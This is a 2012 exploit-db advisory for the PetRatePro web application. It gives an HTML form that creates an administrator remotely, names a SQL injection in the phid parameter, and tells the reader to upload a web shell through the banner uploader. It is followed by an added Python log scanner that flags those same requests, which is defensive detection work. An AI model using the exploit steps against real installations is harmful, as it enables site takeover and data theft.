Auxilium PetRatePro – Multiple Vulnerabilities

  • Author: DaOne
    Date: 2012-09-17
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/21329/
  • ##########################################
    [~] Exploit Title: Auxilium PetRatePro Multiple Vulnerabilities
    [~] Date: 14/09/2012
    [~] Author: DaOne (@LibyanCA)
    [~] Software Link: http://www.auxiliumsoftware.com
    [~] Google Dork: "N/A"
    ##########################################
    
    [#] 1-[Remote Add Admin]:
    
    <form name="myform" method="post" action="http://localhost/PetRatePro/admin/createnewadmin.php" onsubmit="javascript: return checkifvalid();">
    (Create New Administrator)
    Username
    <input name="username" type="text" id="name" size="20">
    Password<input name="upassword" type="text" id="upassword" size="20">
    Name<input name="name1" type="text" id="name1" size="20">
    Email Address <input name="email" type="text" id="email" size="20">
    <input type="submit" value="Create " name="B1">
    </form>
    
    
    
    [#] 2-[SQL Injection]
    
    Vulnerable parameter: phid in viewcomments.php
    
    http://localhost/PetRatePro/viewcomments.php?phid=[SQLi]
    
    
    
    [#] 3-[Remote File Upload]
    
    Go to: http://localhost/PetRatePro/admin/sitebanners/upload_banners.php
    and upload your shell.
    The uploaded file will be found at /PetRatePro/banners/shell.php
    
    
    ##########################################
    [*] Contact me
    www.facebook.com/DaOne.Ly
    ##########################################
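
For anyone checking a PetRatePro install after the fact, the three issues above map onto access-log patterns that can be reviewed. The following is an added example, not part of the original advisory or of the product's code: it flags requests to the endpoints the advisory names, using constructed combined-format log lines, and it assumes that phid is normally a plain numeric ID.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request part of a combined-format access-log line: "METHOD target HTTP/x.y"
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Script extensions that should never be served from the banner directory
SCRIPT_RE = re.compile(r"/banners/[^/]+\.(php\d?|phtml|phar)$")

def classify(line):
    """Return finding labels for one log line (empty list = nothing of note)."""
    m = REQ_RE.search(line)
    if not m:
        return []
    method, url = m["method"], urlsplit(m["target"])
    path = url.path.lower()
    findings = []
    # Issue 1: admin creation. Legitimate admins post here too, so treat a
    # hit as a lead and check the source against known admin sessions.
    if method == "POST" and path.endswith("/admin/createnewadmin.php"):
        findings.append("admin-create")
    # Issue 2: phid carrying anything but ASCII digits (assumption: numeric ID).
    if path.endswith("/viewcomments.php"):
        values = parse_qs(url.query, keep_blank_values=True).get("phid", [])
        if any(not (v.isascii() and v.isdigit()) for v in values):
            findings.append("phid-non-numeric")
    # Issue 3: banner upload, and any script later requested from /banners/.
    if method == "POST" and path.endswith("/admin/sitebanners/upload_banners.php"):
        findings.append("banner-upload")
    if SCRIPT_RE.search(path):
        findings.append("script-in-banners")
    return findings

def scan(lines):
    """Return (line_number, findings) for every line with at least one finding."""
    hits = ((n, classify(l)) for n, l in enumerate(lines, 1))
    return [(n, f) for n, f in hits if f]

# Constructed sample log lines (documentation-range IPs, not real traffic)
SAMPLE = [
    '203.0.113.5 - - [17/Sep/2012:10:00:01 +0000] "GET /PetRatePro/viewcomments.php?phid=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [17/Sep/2012:10:02:11 +0000] "GET /PetRatePro/viewcomments.php?phid=12%27 HTTP/1.1" 200 312',
    '203.0.113.9 - - [17/Sep/2012:10:03:40 +0000] "POST /PetRatePro/admin/createnewadmin.php HTTP/1.1" 302 0',
    '203.0.113.9 - - [17/Sep/2012:10:04:02 +0000] "POST /PetRatePro/admin/sitebanners/upload_banners.php HTTP/1.1" 200 88',
    '203.0.113.9 - - [17/Sep/2012:10:04:09 +0000] "GET /PetRatePro/banners/shell.php HTTP/1.1" 200 14',
    '203.0.113.5 - - [17/Sep/2012:10:05:00 +0000] "GET /PetRatePro/banners/top.gif HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for lineno, labels in scan(SAMPLE):
        print(lineno, ",".join(labels))
```

A script-in-banners hit is the strongest signal of the four, since a banner directory has no reason to serve PHP; disabling script execution for that directory in the web server configuration removes the impact of the upload issue even before the application is fixed.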